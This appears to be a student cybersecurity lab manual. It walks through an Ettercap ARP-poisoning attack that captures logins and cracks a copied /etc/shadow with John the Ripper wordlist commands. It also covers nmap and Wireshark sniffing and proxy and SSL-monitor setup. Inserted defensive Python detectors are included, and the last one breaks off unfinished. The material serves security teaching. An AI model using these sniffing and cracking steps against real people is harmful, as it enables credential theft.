Lab Manual

Uploaded by Om Shirdhankar

© All Rights Reserved

Experiment 1

Aim: Man-in-the-Middle Attack (Windows + Linux Client)


Theory: Man in the Middle Attack Techniques

1 Sniffing

Sniffing is a technique that allows attackers to inspect packets at a low level using a packet
capturing tool. The attacker uses a wireless device that can be put into monitoring or
promiscuous mode.

The attacker can then see packets that were not intended for it, such as packets addressed to
other hosts. ARP poisoning and MAC spoofing are helpful for this technique.

2 Packet Injection

Packet injection is the process of forging or spoofing packets and interfering with a pre-established
communication connection between two parties. The injected packets look like part of a normal
communication stream. It allows an attacker to intercept packets from the communication data as
it travels over the network.

An attacker can also leverage their device's monitoring mode to inject malicious packets into
data communication streams. Packet injection usually involves first sniffing to determine how
and when to craft and send packets.

3 Session Hijacking

When you log in to any web application, the login mechanism creates a temporary session token
for use in future communication. For example, once you log in to Facebook, a session token is
generated, and this token is used for all further communication in that session.

If a hacker steals this session token, he is able to gain access to your Facebook account.

An attacker can sniff sensitive traffic to identify the session token for a user and use it to make
requests as that user. The attacker does not need to spoof anything once he has a session token.

4 SSL Stripping

Since using HTTPS is a common safeguard against ARP or DNS spoofing, attackers use SSL
stripping to intercept packets and rewrite their HTTPS-based address requests to the HTTP
equivalent endpoint, forcing the host to make requests to the server unencrypted. Sensitive
information can then be leaked in plain text.

What are the Man in the Middle attack tools?

There are many tools available for Man in the Middle attacks, some for Windows and some for
Linux. Most of the tools are available for Linux. If you are using the Kali Linux operating
system, you will get all the required tools pre-installed.

Some tools are described below.

Tool 1 - Ettercap:

Ettercap is a comprehensive suite for Man in the Middle attacks. It comes preinstalled in most
cybersecurity operating systems, including Kali Linux, Parrot OS, BlackArch, Blackbox, etc. It
has all the required features and attack tools used in MITM, for example ARP poisoning,
sniffing, capturing data, etc.

Tool 2 - TCPdump:

TCPdump is a command-line tool and a powerful packet analyzer. It helps an attacker to dump
TCP packets during transmission over the network. But this single tool cannot perform the
MITM: you must use one of the ARP spoofing tools for ARP poisoning and another for routing
the traffic, incoming as well as outgoing.

Tool 3 - Wireshark:

Wireshark is one of the most popular and useful tools for a network security researcher. It has a
graphical interface with multiple data filtering capabilities. This is one of the best hacker tools.
But this single tool cannot perform MITM; you must do ARP poisoning and traffic routing with
the help of other tools.

Kali Linux Man in the Middle Attack with Ettercap

Victim 1:

Hardware: Virtual Machine

Operating System: Windows 7

IP Address: 192.168.56.1

MAC Address: 08:00:27:00:04:93

Victim 2:

Hardware: Virtual Machine

Operating System: Windows XP

IP Address: 192.168.56.102

MAC Address: 08:00:27:79:2C:92

Attacker:

Hardware: Virtual Machine

Operating System: Kali Linux

IP Address: 192.168.56.101

MAC Address: 08:00:27:4D:3A:BA

Step 1: On Kali Linux, Ettercap is installed by default. To open it, go to

Application > Sniffing & Spoofing > ettercap-graphical

Step 2: Go to Sniff > Unified Sniffing, or press Shift+U.

Another window will pop up where you need to select the network interface from the drop-down
menu and click Next.

Next, go to Hosts > Scan for hosts.

With this option, the attacker system will scan the whole network and find out how many devices
are connected to the network.

Next step: to see the connected hosts in the network,

go to Hosts > Host list, or press the H key.

A new tab will appear. In this menu select the desired host and click Add to Target 1, then select
another host and click Add to Target 2.

Next, go to Mitm > Arp poisoning. After clicking this option a new window will pop up; check
"Sniff remote connections" and click OK. ARP poisoning will start automatically.

Now you can sniff data by clicking Start > Start Sniffing, or Ctrl+W.

When you have finished all these steps, sniffing will be running. If you want to check whether
ARP poisoning is active, go to Plugins > Manage the plugins, or Ctrl+P,

and click on chk_poison. You will see a result like the following image.

When a user accesses any page and enters login credentials, they will be captured by the attacker
machine (see result).
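The chk_poison plugin checks the poisoning from the attacker's side. The defender's counterpart is to watch ARP replies for the symptoms that ARP poisoning leaves on the wire. The following is an added example, not code from this lab manual or from Ettercap: it runs over constructed ARP reply records that reuse the lab's victim and attacker addresses, and flags an IP whose MAC binding changes mid-session and a single MAC that answers for several IPs. The function names are my own.

```python
"""Added example: flag ARP poisoning symptoms in a stream of ARP replies.

Not part of the lab manual or Ettercap. The reply records below are
constructed; the addresses come from the lab's victim/attacker table, and the
last two records simulate the attacker's MAC being announced for both victims.
"""
from collections import defaultdict

# Constructed ARP reply stream: (seconds since start, sender IP, sender MAC)
SAMPLE_ARP_REPLIES = [
    (1.0, "192.168.56.1",   "08:00:27:00:04:93"),  # Victim 1 (Windows 7)
    (1.1, "192.168.56.102", "08:00:27:79:2C:92"),  # Victim 2 (Windows XP)
    (1.2, "192.168.56.101", "08:00:27:4D:3A:BA"),  # Attacker (Kali)
    (5.0, "192.168.56.1",   "08:00:27:4D:3A:BA"),  # poisoned: victim 1's IP now claims attacker MAC
    (5.1, "192.168.56.102", "08:00:27:4D:3A:BA"),  # poisoned: victim 2's IP now claims attacker MAC
]


def normalize_mac(mac):
    """Lower-case and strip so differently formatted MACs compare equal."""
    return mac.strip().lower()


def detect_arp_poisoning(replies):
    """Return alert dicts, in order of detection, for two poisoning symptoms.

    ip_mac_change:    an IP that was bound to one MAC is now claimed by another.
    mac_multiple_ips: one MAC has claimed more than one IP (the poisoner
                      answers for every victim it targets).
    A legitimate DHCP re-lease or NIC replacement can also trigger the first
    check, so alerts are evidence to investigate, not proof on their own.
    """
    ip_to_mac = {}
    mac_to_ips = defaultdict(set)
    alerts = []
    for ts, ip, mac in replies:
        mac = normalize_mac(mac)
        previous = ip_to_mac.get(ip)
        if previous is not None and previous != mac:
            alerts.append({"time": ts, "type": "ip_mac_change", "ip": ip,
                           "old_mac": previous, "new_mac": mac})
        ip_to_mac[ip] = mac
        mac_to_ips[mac].add(ip)
        if len(mac_to_ips[mac]) > 1:
            alerts.append({"time": ts, "type": "mac_multiple_ips", "mac": mac,
                           "ips": sorted(mac_to_ips[mac])})
    return alerts


def suspect_macs(alerts):
    """MACs named in ip_mac_change or mac_multiple_ips alerts, for follow-up."""
    macs = set()
    for alert in alerts:
        macs.add(alert.get("new_mac") or alert.get("mac"))
    return sorted(macs)


if __name__ == "__main__":
    found = detect_arp_poisoning(SAMPLE_ARP_REPLIES)
    for alert in found:
        print(alert)
    print("suspect MACs:", suspect_macs(found))
```

On a real network the reply records would come from a packet capture (for example the ARP rows of a Wireshark export); the two checks are the same ones a switch's dynamic ARP inspection or a host-based tool applies.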

Experiment 2

Aim: Experimenting with password cracking utilities, attempting dictionary, hybrid, and
brute-force attacks.

Theory: Man in the Middle Attack Techniques

Password Storage in the Kali Linux Operating System

Passwords are used to protect the system from unauthorized access.

Computers running the Kali Linux operating system store passwords in the /etc/shadow file
in the form of a Message Digest 5 (MD5), Blowfish, or Secure Hash Algorithm (SHA-256 /
SHA-512) hash.

Passwords are stored in the form of a hash because of its irreversible property. This means that
a plaintext password can be converted to a hash, but the hash cannot be converted back to plaintext.

PASSWORD CRACKING

Password cracking in the Kali Linux operating system is the process of recovering passwords from
the shadow file.

The purpose of password cracking is to recover a forgotten password. A forensic team can
perform password cracking on a computer system to recover its data after obtaining the password.

This is usually accomplished by recovering the passwords from the data stored in the shadow file in
the form of hash values.
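The shadow file records which hashing scheme protects each account in the prefix of the password field, which is what lets an administrator find accounts that still rely on the weaker MD5 scheme before an attacker does. The following is an added example, not code from this lab manual or from John the Ripper: a parser for shadow-format lines and an audit that reports weak schemes, empty password fields and locked accounts. The sample lines are constructed and their hash bodies are placeholders.

```python
"""Added example: audit the hash schemes used in an /etc/shadow file.

Not part of the lab manual or of John the Ripper. The password field of a
shadow entry starts with an identifier that names the hashing scheme ($1$ for
MD5 crypt, $5$ for SHA-256 crypt, $6$ for SHA-512 crypt, and so on). This
auditor reports accounts whose hashes use the weaker MD5 scheme, accounts with
an empty password field, and accounts that are locked. The shadow lines below
are constructed; the hash bodies are placeholders, not real hashes.
"""

# Password-field prefix -> hashing scheme (as used by glibc crypt and libxcrypt)
HASH_SCHEMES = {
    "$1$": "md5crypt",
    "$2a$": "bcrypt",
    "$2b$": "bcrypt",
    "$2y$": "bcrypt",
    "$5$": "sha256crypt",
    "$6$": "sha512crypt",
    "$y$": "yescrypt",
}
WEAK_SCHEMES = {"md5crypt"}

# Constructed shadow file: user:password:lastchange:min:max:warn:inactive:expire:reserved
SAMPLE_SHADOW = """\
root:$6$saltsalt$PLACEHOLDERHASHBODY:19500:0:99999:7:::
alice:$1$abcdefgh$PLACEHOLDERHASHBODY:19500:0:99999:7:::
bob:!:19500:0:99999:7:::
daemon:*:19500:0:99999:7:::
svc:$6$rounds=100000$saltsalt$PLACEHOLDERHASHBODY:19500:0:99999:7:::
broken::19500:0:99999:7:::
"""


def classify_password_field(field):
    """Return (state, scheme) for one shadow password field."""
    if field == "":
        return "empty", None          # no password needed to log in
    if field.startswith("!") or field == "*":
        return "locked", None         # disabled account or lock prefix
    for prefix, scheme in HASH_SCHEMES.items():
        if field.startswith(prefix):
            return "hashed", scheme
    return "unknown", None


def parse_shadow(text):
    """Parse shadow-format text into a list of per-account dicts."""
    entries = []
    for line in text.splitlines():
        if not line.strip():
            continue
        fields = line.split(":")
        if len(fields) != 9:
            raise ValueError(f"malformed shadow line: {line!r}")
        state, scheme = classify_password_field(fields[1])
        entries.append({"user": fields[0], "state": state, "scheme": scheme,
                        "last_change_days": fields[2]})
    return entries


def audit_shadow(text):
    """Return (user, finding) tuples an administrator should act on."""
    findings = []
    for entry in parse_shadow(text):
        if entry["state"] == "empty":
            findings.append((entry["user"], "empty password field"))
        elif entry["state"] == "unknown":
            findings.append((entry["user"], "unrecognized password field"))
        elif entry["state"] == "hashed" and entry["scheme"] in WEAK_SCHEMES:
            findings.append((entry["user"], f"weak hash scheme {entry['scheme']}"))
    return findings


if __name__ == "__main__":
    for user, finding in audit_shadow(SAMPLE_SHADOW):
        print(f"{user}: {finding}")
```

Reading the real file requires root (`sudo cat /etc/shadow`); the auditor itself never needs the plaintext passwords, only the scheme prefixes, so it can run as part of a routine hardening check.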

PASSWORD CRACKING TECHNIQUES

The password cracking techniques are discussed as follows:

BRUTE FORCE: A brute force technique is an attempt to crack passwords using a permutation
and combination approach. This method takes a lot of time and memory, depending on the length
and complexity of the password.

DICTIONARY: A dictionary technique is an attempt to store a prepared set of passwords in a file
known as a dictionary. Instead of trying all combinations of passwords, it creates a word list of
the most common passwords and calculates their hash values while cracking the passwords. It will
only be able to crack the password if it is present in the dictionary file. This technique takes less
time than the brute-force technique to crack the password.

RAINBOW TABLES: This technique is the same as the dictionary technique, but instead of
calculating hash values during password cracking, it stores precomputed hash values of passwords
in tables. Thus, this technique takes less time than the brute-force and dictionary techniques to
crack the password.

JOHN-THE-RIPPER TOOL

The John-the-Ripper tool [2] is an open-source application and post-exploitation tool in the Kali
Linux operating system that allows users to view authentication credentials.

This tool works on the hashes taken from the shadow file of the Kali Linux operating system.

Kali Linux stores password data in the shadow file in the form of a hash. A forensics team can
use the John-the-Ripper tool to get the password in plain text and use it to log in to the target
computer.

PASSWORD CRACKING WITH THE JOHN-THE-RIPPER TOOL

The plaintext password can be recovered from its hash with the John-the-Ripper tool using the
following steps:

Step 1: Open the Kali Linux operating system as shown in Figure 1.

Step 2: In the Kali Linux operating system, open the John-the-Ripper tool. Go to Applications ->
Password attacks -> john as shown in Figure 2.

Figure 2: Opening John-the-Ripper tool

Step 3: A terminal with the usage of the John-the-Ripper tool will open as shown in Figure 3 and
Figure 4.

Figure 3: John-the-Ripper tool in Terminal

Figure 4: John-the-Ripper tool in Terminal

Step 4: Search for a password wordlist using the Google search engine as shown in Figure 5.
Open the GitHub website and download the ZIP file as shown in Figure 6.

Figure 5: Search password wordlist

Figure 6: Download password wordlist

Step 5: Save and open the downloaded file as shown in Figure 7. Open the "Real-Passwords"
folder to see the password wordlists as shown in Figure 8.

Figure 7: Password folder in downloaded file

Figure 8: Password wordlist

Step 6: Open any password wordlist (e.g., the Top12Thousand-probable-v2.txt file) as shown in
Figure 9. Copy this file to the Home directory and rename it "wordlist.txt" as shown in Figure 10.

Figure 10: Wordlist file in Home directory

Step 7: Add new users to the Kali Linux operating system as shown in Figure 11, Figure 12, and
Figure 13. Set a password and press 'Y' while creating each new user.

Step 8: Go to Other Locations -> Computer -> etc folder to find the shadow file as shown in Figure
14, Figure 15, and Figure 16.

Figure 14: Opening other locations in Kali Linux operating system

Figure 15: Opening etc folder in Kali Linux operating system

Figure 16: Finding Shadow file

Step 9: Copy the shadow file and paste it in the Home directory as shown in Figure 17.

Figure 17: Copy of Shadow file and Wordlist in Home directory

Step 9: Rename the shadow file as shadow1 and open the file to find the usernames and
passwords in the form of hash values as shown in Figure 18 and Figure 19.

Figure 18: Opening Shadow file

Figure 19: Opening Shadow file

Step 10: Run the command "john --wordlist=/root/wordlist.txt shadow1" to recover the hash of
root and "john --show shadow1" to display the passwords in plaintext as shown in Figure 20.

Figure 20: Cracking password of Root

Step 10: Run the command "john --wordlist=/root/wordlist.txt --format=sha512crypt shadow1" to
recover the hashes of the other users and "john --show shadow1" to display the passwords in
plaintext as shown in Figure 21.

The passwords in plaintext are displayed in Figure 21 and highlighted in a red rectangular box.

Figure 21: Cracking password of other users

Experiment 3

Aim: Researching System Vulnerabilities (Internet - access CVE database of vulnerabilities)

Theory: Add vulnerabilities of the Windows XP and 7 operating systems with CVE and exploitation
details.

Experiment 4

Aim: Intercepting and Sniffing Network Traffic using nmap.

Theory:

For Kali: Netdiscover is an active/passive address reconnaissance tool, mainly developed for
wireless networks without a DHCP server. It can also be used on hub/switch networks.

What are the different techniques used to identify and sniff packets using nmap and
Wireshark?

ARP Scan

An ARP scan is a low-level network discovery tool used to associate physical (MAC) addresses
with logical (IP) addresses. It is used to identify network assets that may not normally be captured
by network scanning devices. When assessing a system we want to be able to identify
vulnerabilities, and the first thing we can do is reconnaissance. Nmap allows us to identify the
different hosts on a network and the different services the devices are running. ARP scans allow
us to identify the state of a device and sniff packets from the host machine. This allows us to see
who is the sender and who is the receiver.

TCP Half Open

One of the more common and popular port scanning techniques is the TCP half-open port scan,
sometimes referred to as a SYN scan. It is a fast and sneaky scan that tries to find potential open
ports on the target computer.

SYN packets request a response from a computer, and an ACK packet is a response. In a typical
TCP transaction, there is a SYN, an ACK from the service, and a third ACK confirming that the
message was received.

This scan is fast and hard to detect because it never completes the full TCP 3-way handshake.
The scanner sends a SYN message and just notes the SYN-ACK responses. The scanner
does not complete the connection by sending the final ACK: it leaves the target hanging.

Any SYN-ACK responses are possibly open ports. An RST (reset) response means the port is
closed, but there is a live computer there. No response indicates SYN is filtered on the network.
No response to an ICMP (ping) request also counts as a filtered response.

What does a TCP Half Open scan look like in Terminal and on Wireshark?

TCP Three-Way Handshake

A THREE-WAY HANDSHAKE or TCP 3-way handshake is a process that is used in a TCP/IP
network to make a connection between the server and client. It is a three-step process that
requires both the client and server to exchange synchronization and acknowledgment packets
before the real data communication process starts.

The three-way handshake process is designed in such a way that both ends help you to initiate,
negotiate, and separate TCP socket connections at the same time. It allows you to transfer
multiple TCP socket connections in both directions at the same time.

Experiment 5

Aim: Intercepting and Sniffing Network Traffic using nmap.

Theory:

Capturing data packets on Wireshark

When you open Wireshark, you see a screen showing you a list of all the network connections
you can monitor. You also have a capture filter field to capture only the network traffic you want
to see.

You can select one or more of the network interfaces using Shift+left-click. Once you have selected
the network interface, you can start the capture, and there are several ways to do that.

Click the first button on the toolbar, titled "Start capturing packets."

You can select the menu item Capture -> Start.

Or you could use the keystroke Control+E.

During the capture, Wireshark will show you the packets captured in real time.

Once you have captured all the packets needed, use the same buttons or menu options to stop the
capture as you did to begin.

Best practice dictates stopping Wireshark's packet capture before analysis.

Analyzing data packets on Wireshark

Wireshark shows you three different panes for inspecting packet data. The Packet List, the top
pane, lists all the packets in the capture. When you click on a packet, the other two panes change
to show you the details about the selected packet. You can also tell if the packet is part of a
conversation. Here are details about each column in the top pane:

- No.: This is the number order of the packet captured. The bracket indicates that this
  packet is part of a conversation.

- Time: This column shows how long after you started the capture this particular packet
  was captured. You can change this value in the Settings menu to display a different
  option.

- Source: This is the address of the system that sent the packet.

- Destination: This is the address of the packet destination.

- Protocol: This is the type of packet. For example: TCP, DNS, DHCPv6, or ARP.

- Length: This column shows you the packet's length, measured in bytes.

- Info: This column shows you more information about the packet contents, which will
  vary depending on the type of packet.

Packet Details, the middle pane, shows you as much readable information about the packet as
possible, depending on the packet type. You can right-click and create filters based on the
highlighted text in this field.

The bottom pane, Packet Bytes, displays the packet exactly as it was captured in hexadecimal.

When looking at a packet that is part of a conversation, you can right-click the packet and select
Follow to see only the packets that are part of that conversation.
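The Packet List columns above are also what Wireshark writes when you export the pane as CSV, and they carry enough to answer the question from Experiment 4 of what a TCP half-open scan looks like. The following is an added example, not code from this lab manual or from Wireshark: it reads a constructed CSV export with those columns, rebuilds each handshake from the TCP flags in the Info column, classifies probed ports as open (SYN-ACK seen), closed (RST from the target) or filtered (no reply), and reports a source that probes several ports without ever sending the final ACK as a half-open scan. In the sample, 192.168.56.101 plays the scanner and 192.168.56.102 a normal client.

```python
"""Added example: spot a TCP half-open (SYN) scan in a Wireshark packet list.

Not part of the lab manual or of Wireshark. Input is a CSV export of the
Packet List pane with the columns No., Time, Source, Destination, Protocol,
Length and Info. The CSV below is constructed.
"""
import csv
import io
import re

SAMPLE_CSV = '''"No.","Time","Source","Destination","Protocol","Length","Info"
"1","0.000000","192.168.56.101","192.168.56.1","TCP","58","40001 → 22 [SYN] Seq=0 Win=1024 Len=0"
"2","0.000120","192.168.56.1","192.168.56.101","TCP","58","22 → 40001 [SYN, ACK] Seq=0 Ack=1 Win=64240 Len=0"
"3","0.000200","192.168.56.101","192.168.56.1","TCP","54","40001 → 22 [RST] Seq=1 Win=0 Len=0"
"4","0.001000","192.168.56.101","192.168.56.1","TCP","58","40002 → 80 [SYN] Seq=0 Win=1024 Len=0"
"5","0.001100","192.168.56.1","192.168.56.101","TCP","54","80 → 40002 [RST, ACK] Seq=0 Ack=1 Win=0 Len=0"
"6","0.002000","192.168.56.101","192.168.56.1","TCP","58","40003 → 443 [SYN] Seq=0 Win=1024 Len=0"
"7","0.002100","192.168.56.1","192.168.56.101","TCP","58","443 → 40003 [SYN, ACK] Seq=0 Ack=1 Win=64240 Len=0"
"8","0.002200","192.168.56.101","192.168.56.1","TCP","54","40003 → 443 [RST] Seq=1 Win=0 Len=0"
"9","0.003000","192.168.56.101","192.168.56.1","TCP","58","40004 → 8080 [SYN] Seq=0 Win=1024 Len=0"
"10","1.000000","192.168.56.102","192.168.56.1","TCP","66","51000 → 445 [SYN] Seq=0 Win=64240 Len=0"
"11","1.000100","192.168.56.1","192.168.56.102","TCP","66","445 → 51000 [SYN, ACK] Seq=0 Ack=1 Win=64240 Len=0"
"12","1.000200","192.168.56.102","192.168.56.1","TCP","54","51000 → 445 [ACK] Seq=1 Ack=1 Win=64240 Len=0"
'''

# "sport → dport [FLAGS]" as Wireshark prints it (older builds use ">" instead of "→")
INFO_RE = re.compile(r"^(\d+)\s*(?:→|>)\s*(\d+)\s+\[([A-Z, ]+)\]")


def parse_packet_list(csv_text):
    """Turn the CSV export into dicts with ports and a set of TCP flags."""
    packets = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        m = INFO_RE.match(row["Info"]) if row["Protocol"] == "TCP" else None
        if not m:
            continue  # non-TCP rows (ARP, DNS, ...) carry no handshake state
        packets.append({"no": int(row["No."]), "time": float(row["Time"]),
                        "src": row["Source"], "dst": row["Destination"],
                        "sport": int(m.group(1)), "dport": int(m.group(2)),
                        "flags": {f.strip() for f in m.group(3).split(",")}})
    return packets


def analyse_handshakes(packets):
    """Map (client, cport, server, sport) -> final handshake state."""
    probes = {}
    for p in packets:
        fwd = (p["src"], p["sport"], p["dst"], p["dport"])   # client -> server
        rev = (p["dst"], p["dport"], p["src"], p["sport"])   # server -> client reply
        f = p["flags"]
        if "SYN" in f and "ACK" not in f:
            probes[fwd] = "syn"                      # client opened a probe
        elif "SYN" in f and probes.get(rev) == "syn":
            probes[rev] = "synack"                   # server answered: port open
        elif "RST" in f and probes.get(rev) == "syn":
            probes[rev] = "closed"                   # server refused: port closed
        elif "RST" in f and probes.get(fwd) == "synack":
            probes[fwd] = "aborted"                  # client tore down instead of ACKing
        elif "ACK" in f and probes.get(fwd) == "synack":
            probes[fwd] = "completed"                # full three-way handshake
    return probes


def summarise_by_source(probes, min_ports=3):
    """Per client: port outcomes, and whether the pattern is a half-open scan."""
    summary = {}
    for (client, _cport, server, sport), state in probes.items():
        s = summary.setdefault(client, {"targets": set(), "open": set(), "closed": set(),
                                        "filtered": set(), "completed": 0, "aborted": 0})
        s["targets"].add((server, sport))
        if state in ("synack", "aborted", "completed"):
            s["open"].add(sport)          # a SYN-ACK was seen
        elif state == "closed":
            s["closed"].add(sport)
        elif state == "syn":
            s["filtered"].add(sport)      # no reply at all
        if state == "completed":
            s["completed"] += 1
        elif state == "aborted":
            s["aborted"] += 1
    for s in summary.values():
        s["half_open_scan"] = len(s["targets"]) >= min_ports and s["completed"] == 0
    return summary


if __name__ == "__main__":
    report = summarise_by_source(analyse_handshakes(parse_packet_list(SAMPLE_CSV)))
    for client, s in report.items():
        print(client, "half-open scan" if s["half_open_scan"] else "normal", sorted(s["open"]))
```

The RST the scanner sends back after each SYN-ACK (packets 3 and 8) is the tell-tale of a half-open scan as opposed to a connection that simply timed out; the `min_ports` threshold keeps a single failed connection from being reported.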

Wireshark filters

Some of the best features of Wireshark are the capture filters and display filters. Filters allow
you to view the capture the way you need to see it to troubleshoot the issues at hand. Below are
several filters to get you started.

Wireshark capture filters

Capture filters limit the captured packets by the chosen filter. If the packets don't match the
filter, Wireshark won't save them. Examples of capture filters include:

host IP-address: This filter limits the captured traffic to and from the IP address

net 192.168.0.0/24: This filter captures all traffic on the subnet

dst host IP-address: Capture packets sent to the specified host

port 53: Capture traffic on port 53 only

port not 53 and not arp: Capture all traffic except DNS and ARP traffic

Wireshark display filters


Wireshark display filters change the view of the capture during analysis. After you’ve stopped
the packet capture, use display filters to narrow down the packets in the Packet List to
troubleshoot your issue.

One of the most useful display filters is:

ip.src==IP-address and ip.dst==IP-address

This filter shows packets sent from one computer (ip.src) to another (ip.dst). You can also use
ip.addr to show packets to and from that IP. Other filters include:

tcp.port eq 25: This filter will show you all traffic on port 25, which is usually SMTP traffic

icmp: This filter will show you only ICMP traffic in the capture, most likely they are pings

ip.addr != IP_address: This filter shows you all traffic except the traffic to or from the specified
computer

Analysts even build filters to detect specific attacks, like this filter used to detect the Sasser
worm:

ls_ads.opnum==0x09

Additional Wireshark features

Beyond capture and filtering, several other features in Wireshark can make your job easier.

Wireshark colorization options

You can configure Wireshark to color your packets in the Packet List according to the display
filter, which allows you to emphasize the packets you want to highlight.

Wireshark promiscuous mode

By default, Wireshark only captures packets going to and from the computer where it runs. By
checking the box to run Wireshark in promiscuous mode in the capture settings, you can capture
most of the traffic on the LAN.

Wireshark command line

Wireshark does provide a command line interface (CLI) if you operate a system without a
graphical user interface (GUI). The best practice would be to use the CLI to capture and save a
log so you can review the log with the GUI.

Wireshark commands

- wireshark : run Wireshark in GUI mode

- wireshark -h : show available command line parameters for Wireshark

- wireshark -a duration:300 -i eth1 -w wireshark : capture traffic on the Ethernet interface
  eth1 for five minutes. -a means automatically stop the capture, -i specifies which interface
  to capture, and -w names the file the capture is written to

Metrics and statistics

Under the Statistics menu, you'll find a plethora of options to view details about your capture.

Capture File Properties:

Wireshark I/O Graph:

Experiment 6

Aim: Configure a Proxy in Linux

Theory:

You configure global HTTP and HTTPS proxies in the /etc/profile.d/ directory of Cumulus Linux.
Set the http_proxy and https_proxy variables to configure the switch with the address of the proxy
server you want to use to get URLs on the command line. This is useful for programs such
as apt, apt-get, curl and wget, which can all use this proxy.

1. In a terminal, create a new file in the /etc/profile.d/ directory.

cumulus@switch:~$ sudo nano /etc/profile.d/proxy.sh

2. Add a line to the file to configure either an HTTP or an HTTPS proxy, or both:

- HTTP proxy:

http_proxy=http://myproxy.domain.com:8080
export http_proxy

- HTTPS proxy:

https_proxy=https://myproxy.domain.com:8080
export https_proxy

3. Create a file in the /etc/apt/apt.conf.d directory and add the following lines to the file to get
the HTTP and HTTPS proxies. The example below uses http_proxy as the file name:

cumulus@switch:~$ sudo nano /etc/apt/apt.conf.d/http_proxy

Acquire::http::Proxy "http://myproxy.domain.com:8080";
Acquire::https::Proxy "https://myproxy.domain.com:8080";

4. Add the proxy addresses to the /etc/wgetrc file, then uncomment the http_proxy and
https_proxy lines, if necessary:

cumulus@switch:~$ sudo nano /etc/wgetrc

...
https_proxy = https://myproxy.domain.com:8080
http_proxy = http://myproxy.domain.com:8080
...

5. To execute the /etc/profile.d/proxy.sh file in the current environment, run
the source command:

cumulus@switch:~$ source /etc/profile.d/proxy.sh

Use the echo command to confirm the configuration:

- HTTP proxy:

cumulus@switch:~$ echo $http_proxy
http://myproxy.domain.com:8080

- HTTPS proxy:

cumulus@switch:~$ echo $https_proxy
https://myproxy.domain.com:8080

Experiment 7
Aim: Create a Monitoring System using Certificates and SSL
Theory:
Adding and editing an SSL Certificate monitor in WhatsUp Gold
This monitor checks a specific location for the existence of a valid SSL certificate. The monitor
reports as down if the URL cannot be resolved, if the location cannot be accessed, or in cases
where the monitor is configured to use the URL or the IP address of the configured interface,
an SSL certificate is not found at all.

To add a new SSL Certificate active monitor:

1. From the WhatsUp Gold Web interface, go to Settings > Libraries > Monitors. The
Monitor Library dialog appears.

2. Click the Active tab. The Active Monitor list appears.

3. Click New. The Select Active Monitor Type dialog appears.

4. Select SSL Certificate Monitor, then click OK. The Add SSL Certificate Monitor
dialog appears.

5. Enter the appropriate information:

- Name. Enter a unique name for the active monitor. This name displays in the
  Active Monitor Library.

- Description. Enter additional information about the monitor. This description
  displays next to the monitor in the Active Monitor Library.

6. Select the method by which the monitor should locate the SSL certificate:

- Check certificate by URL. Enter the URL where the monitor should look for a
  certificate. The URL must begin with a proper URI scheme, such as http:// or https://.
  Additionally, this field supports appending the URL with a custom port number.
  Port 443 is used by default; however, you can specify an alternate port number as
  well. For example, to use port 8081, use the following
  format: https://www.<domain>.com:8081.

- Check certificate by file. Enter the shared network location of the certificate in
  UNC format. The monitor searches for and uses credentials tied to the target
  device. The device must have valid Windows credentials and you must have
  proper permissions to access the network share as configured.

Note: Both methods support the percent variables %device.hostname and %device.address.

7. Enable the following additional configuration options, if desired:

- Down if certificate expires in the next X days. Specify the number of days for
  the monitor to consider. The monitor reports the target device as down if
  the SSL certificate is set to expire within the number of days entered.

- Check certificate usage (verifies the Common Name matches the URL
  domain). Select this option to configure the monitor to check that the common
  name on the SSL certificate matches the domain on the URL.

8. Enable and configure the following additional proxy settings, if desired:

- Proxy server. Enter the address of the required proxy server if needed to access
  the configured URL. This option is not valid for Path to File.

- Proxy port. Enter the port on which the proxy server listens.

- Proxy username. If required, enter the username for the proxy server.

- Proxy password. Enter the password that coincides with the username for the
  proxy server.

- Timeout (seconds). Enter the length of time WhatsUp Gold attempts to connect.
  When the time you enter is exceeded without connecting, a timeout occurs and
  WhatsUp Gold stops trying to connect. This is considered a failed connection.
  This option is not valid for Path to File.

9. Check Use in Rescan to have the monitor appear in the Active Monitor list on the Device
Properties dialog. WhatsUp Gold adds the monitor type to the device during a rescan,
which is launched using the Rescan button on the Device Properties dialog, if the
protocol or service is active on the device.

Important: The Use in Rescan control only applies if the %device.address or
%device.hostname percent variable is used in either the Check certificate by URL or the
Check certificate by file configuration field.

10. Click OK to save changes.

To edit an existing SSL Certificate active monitor:

1. From the WhatsUp Gold Web interface, go to Settings > Libraries > Monitors. The
Monitor Library dialog appears.
2. Click the Active tab. The Active Monitor list appears.

3. Select the target SSL Certificate monitor.

4. Click Edit. The Edit SSL Certificate Monitor dialog appears.

5. Modify the configuration settings described previously as needed.

6. Click OK to save changes.
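The monitor options above reduce to three checks: resolve the host and port from the URL (443 unless one is given), compare the certificate's expiry with a days-ahead threshold, and confirm that a name on the certificate matches the URL's host. The following is an added example, not WhatsUp Gold code, that implements those checks in Python on the dictionary form that `ssl.SSLSocket.getpeercert()` returns, so the same evaluation runs offline on the constructed `SAMPLE_CERT` (not a real certificate) or on a live certificate fetched with the `fetch_peer_cert()` helper. All function names are my own.

```python
"""Added example: the checks an SSL certificate monitor performs, in Python.

Not WhatsUp Gold code. It mirrors the options described above: the target
URL with a default port of 443 or an explicit one, "down if the certificate
expires in the next X days", and "check certificate usage" (a certificate
name must match the URL's host). SAMPLE_CERT is a constructed dictionary in
the shape ssl.SSLSocket.getpeercert() returns, not a real certificate.
"""
import socket
import ssl
from datetime import datetime, timezone
from urllib.parse import urlparse

SAMPLE_CERT = {
    "subject": ((("commonName", "www.example.test"),),),
    "subjectAltName": (("DNS", "www.example.test"), ("DNS", "*.example.test")),
    "notBefore": "Jan  1 00:00:00 2024 GMT",
    "notAfter": "Mar  1 00:00:00 2025 GMT",
}


def utc_date(year, month, day):
    """Helper so the demo and tests can pin 'now' to a fixed instant."""
    return datetime(year, month, day, tzinfo=timezone.utc)


def parse_target(url):
    """Host and port from the monitor URL; port 443 unless the URL names one."""
    parts = urlparse(url)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        raise ValueError(f"URL must begin with http:// or https://: {url!r}")
    return parts.hostname, parts.port or 443


def certificate_names(cert):
    """DNS names from subjectAltName, then the subject Common Name."""
    names = [value for kind, value in cert.get("subjectAltName", ()) if kind == "DNS"]
    for rdn in cert.get("subject", ()):
        names.extend(value for key, value in rdn if key == "commonName")
    return names


def name_matches(pattern, hostname):
    """Exact match, or a single-label wildcard such as *.example.test."""
    pattern, hostname = pattern.lower(), hostname.lower()
    if pattern.startswith("*."):
        head, _, tail = hostname.partition(".")
        return bool(head) and tail == pattern[2:]
    return pattern == hostname


def evaluate_certificate(cert, url, now, expire_within_days=None, check_usage=True):
    """Return ("up" | "down", [reasons]) for one monitor poll at time `now`."""
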